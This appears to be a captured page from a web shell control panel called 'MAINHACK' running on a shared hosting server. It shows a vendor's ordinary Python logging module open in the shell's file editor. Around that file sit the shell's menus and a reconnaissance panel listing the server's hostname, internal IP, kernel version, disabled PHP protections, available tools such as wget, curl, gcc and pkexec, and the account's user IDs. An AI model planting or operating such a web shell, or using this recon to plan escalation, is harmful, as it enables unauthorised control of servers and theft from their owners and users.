[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: logsetup.py
File is not writable. Editing disabled.
# coding=utf-8 # # Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2020 All Rights Reserved # # Licensed under CLOUD LINUX LICENSE AGREEMENT # http://cloudlinux.com/docs/LICENCE.TXT # from __future__ import absolute_import import logging import os import pwd from logging import StreamHandler from logging.handlers import SysLogHandler, RotatingFileHandler from clwpos.constants import PROJECT_NAME, SENTRY_DSN, PKG_VERSION from clsentry import init_sentry_client ADMIN_LOGFILE_PATH = "/var/log/clwpos/main.log" USER_WPOS_DIR = ".clwpos" USER_LOGFILE_PATH = os.path.join("{homedir}", USER_WPOS_DIR, "main.log") def setup_logging( caller_name, console_level=logging.CRITICAL, file_level=logging.INFO, logfile_path=ADMIN_LOGFILE_PATH, ): """ Sets up logger and return it to the caller :param str caller_name: :param console_level: :param file_level: :return logging.Logger: log, initialized """ euid = os.geteuid() if euid != 0: username = pwd.getpwuid(euid).pw_name homedir = pwd.getpwnam(username).pw_dir logfile_path = USER_LOGFILE_PATH.format(homedir=homedir) from clwpos.utils import create_clwpos_dir_if_not_exists create_clwpos_dir_if_not_exists(username) logging.root.setLevel(logging.DEBUG) logger = logging.getLogger(caller_name) has_sys_log = any( [True for handler in logger.handlers if isinstance(handler, SysLogHandler)] ) has_file_log = any( [True for handler in logger.handlers if isinstance(handler, RotatingFileHandler)] ) has_console_log = any( [True for handler in logger.handlers if isinstance(handler, StreamHandler)] ) if not has_console_log: logger.addHandler(get_console_log_handler(console_level)) if not has_sys_log: logger.addHandler(get_syslog_handler()) if not has_file_log: logger.addHandler(get_file_log_handler(file_level, logfile_path)) return logger def get_package_version(): """ Strips platform-dependent part of package version. >>> get_package_version('2.6-0.el6.15452.16.1485863269') 2.6-0 """ try: version = PKG_VERSION.split(".el") release = version[0] is_developer = len(version[1]) > 2 except IndexError: release = PKG_VERSION is_developer = True return release, is_developer def init_wpos_sentry_safely(logger=None): """ Inits sentry safely, do not break all functionality if init failed """ version, is_development = get_package_version() try: sentry = init_sentry_client(PROJECT_NAME, release=version, dsn=SENTRY_DSN) sentry.environment = 'Development' if is_development else 'Release' sentry.tags['full_version'] = PKG_VERSION except Exception as e: if logger: logger.warning('Error during sentry init: %s', str(e)) def get_syslog_handler(): try: sys_log = SysLogHandler(address="/dev/log", facility=SysLogHandler.LOG_DAEMON) formatter_sys = logging.Formatter( fmt="clwpos: (%(name)s) [%(levelname)s] %(message)s" ) # write in system log only ERROR-s and FATALLERROR-s sys_log.setFormatter(formatter_sys) sys_log.setLevel(logging.ERROR) return sys_log except Exception: pass def get_file_log_handler(file_level, logfile_path): if not os.path.lexists(logfile_path): umask_saved = os.umask(0o77) try: open(logfile_path, "w").close() finally: os.umask(umask_saved) os.chmod(logfile_path, 0o600) # we save only 5mb of logs per user file_log = RotatingFileHandler(logfile_path, maxBytes=1024 * 1024, backupCount=5) formatter = logging.Formatter( fmt="%(asctime)s: (%(name)s) [%(levelname)s] %(message)s" ) file_log.setFormatter(formatter) file_log.setLevel(file_level) return file_log def get_console_log_handler(console_level): console_log = logging.StreamHandler() formatter_console = logging.Formatter( fmt="%(asctime)s: (%(name)s) [%(levelname)s] %(message)s" ) console_log.setFormatter(formatter_console) console_log.setLevel(console_level) return console_log class NullLogger(logging.Logger): def __init__(self): super(NullLogger, self).__init__('null_logger') nh = logging.NullHandler() self.addHandler(nh)
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server05.hostinghome.co.in
Server IP: 192.168.74.40
PHP Version: 7.4.33
Server Software: Apache
System: Linux server05.hostinghome.co.in 3.10.0-962.3.2.lve1.5.81.el7.x86_64 #1 SMP Wed May 31 10:36:47 UTC 2023 x86_64
HDD Total: 1.95 TB
HDD Free: 691.07 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: itsweb
User ID (UID): 1619
Group ID (GID): 1621
Script Owner UID: 1619
Current Dir Owner: N/A